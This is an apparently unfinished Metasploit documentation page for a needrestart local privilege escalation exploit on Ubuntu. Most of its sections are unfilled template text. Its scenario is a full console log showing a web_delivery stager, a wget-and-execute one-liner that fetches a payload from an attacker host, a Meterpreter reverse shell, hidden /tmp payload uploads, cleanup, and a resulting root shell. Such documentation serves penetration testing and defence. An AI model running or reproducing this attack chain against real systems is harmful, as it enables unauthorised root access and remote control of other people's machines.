adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94e5e49052d4f0f165a3220a488ec33a53b082a2
metasploit-gs/documentation/modules/exploit/linux/local/ubuntu_needrestart_lpe.md
T
h00die 94e5e49052 ubuntu needrestart lpe
2024-11-22 15:44:45 -05:00

4.6 KiB
Raw Blame History

The following is the recommended format for module documentation. But feel free to add more content/sections to this. One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop functioning in 5+ years, so giving links or specific examples can be VERY helpful.

Vulnerable Application

Instructions to get the vulnerable application. If applicable, include links to the vulnerable install files, as well as instructions on installing/configuring the environment if it is different than a standard install. Much of this will come from the PR, and can be copy/pasted.

Verification Steps

Example steps in this format (is also in the PR):

  1. Install the application
  2. Start msfconsole
  3. Do: use [module path]
  4. Do: run
  5. You should get a shell.

Options

List each option and how to use it.

Option Name

Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.

Scenarios

Specific demo of using the module that might be useful in a real world scenario.

Version and OS

msf6 > use exploit/multi/script/web_delivery
998
run[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 7
target => 7
msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(multi/script/web_delivery) > set lport 4998
lport => 4998
msf6 exploit(multi/script/web_delivery) > set srvport 8998
srvport => 8998
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) > 
[*] Started reverse TCP handler on 1.1.1.1:4998 
[*] Using URL: http://1.1.1.1:8998/dKtdkMS
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ejq8lHli --no-check-certificate http://1.1.1.1:8998/dKtdkMS; chmod +x Ejq8lHli; ./Ejq8lHli& disown
[*] 2.2.2.2   web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4998 -> 2.2.2.2:52004) at 2024-11-22 12:07:55 -0500

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: h00die
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/ubuntu_needrestart_lpe
 verbose true
run
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set lport 4977
lport => 4977
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set session 1
session => 1
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set verbose true
verbose => true
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > run

[*] Started reverse TCP handler on 1.1.1.1:4977 
[*] Running automatic check ("set AutoCheck false" to disable)

[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5-5ubuntu2.1 detected on Ubuntu 22.04
[*] Writing '/tmp/.1K8Hy2tOtq' (250 bytes) ...
[*] Uploading payload: /tmp/.1K8Hy2tOtq
[*] Uploading c_stub: /tmp/.hnPKdLeU2s.c
[*] Uploading py_script: /tmp/.FzzlJ
[*] Uploading build and run script: /tmp/.h0IkpDa
[*] Launching exploit, and waiting for needrestart to run...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] chown: changing ownership of '/tmp/.1K8Hy2tOtq': Operation not permitted
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
[*] 
[*]   Traceback (most recent call last):
[*]     File "/usr/lib/python3.10/site.py", line 192, in addpackage
[*]       exec(line)
[*]     File "<string>", line 1, in <module>
[*]   ImportError: dynamic module does not define module export function (PyInit_importlib)
[*] 
[*] Remainder of file ignored
[*] #########################
[*] 
[*] Dont mind the error message above
[*] 
[*] Waiting for needrestart to run...
[*] Payload owned by: root
[+] Deleted /tmp/.1K8Hy2tOtq
[+] Deleted /tmp/.hnPKdLeU2s.c
[+] Deleted /tmp/.FzzlJ
[+] Deleted /tmp/.h0IkpDa
[+] Deleted /tmp/importlib
[*] Meterpreter session 2 opened (1.1.1.1:4977 -> 2.2.2.2:57644) at 2024-11-22 12:08:28 -0500

meterpreter > 
meterpreter > getuid
Server username: root
Reference in New Issue View Git Blame Copy Permalink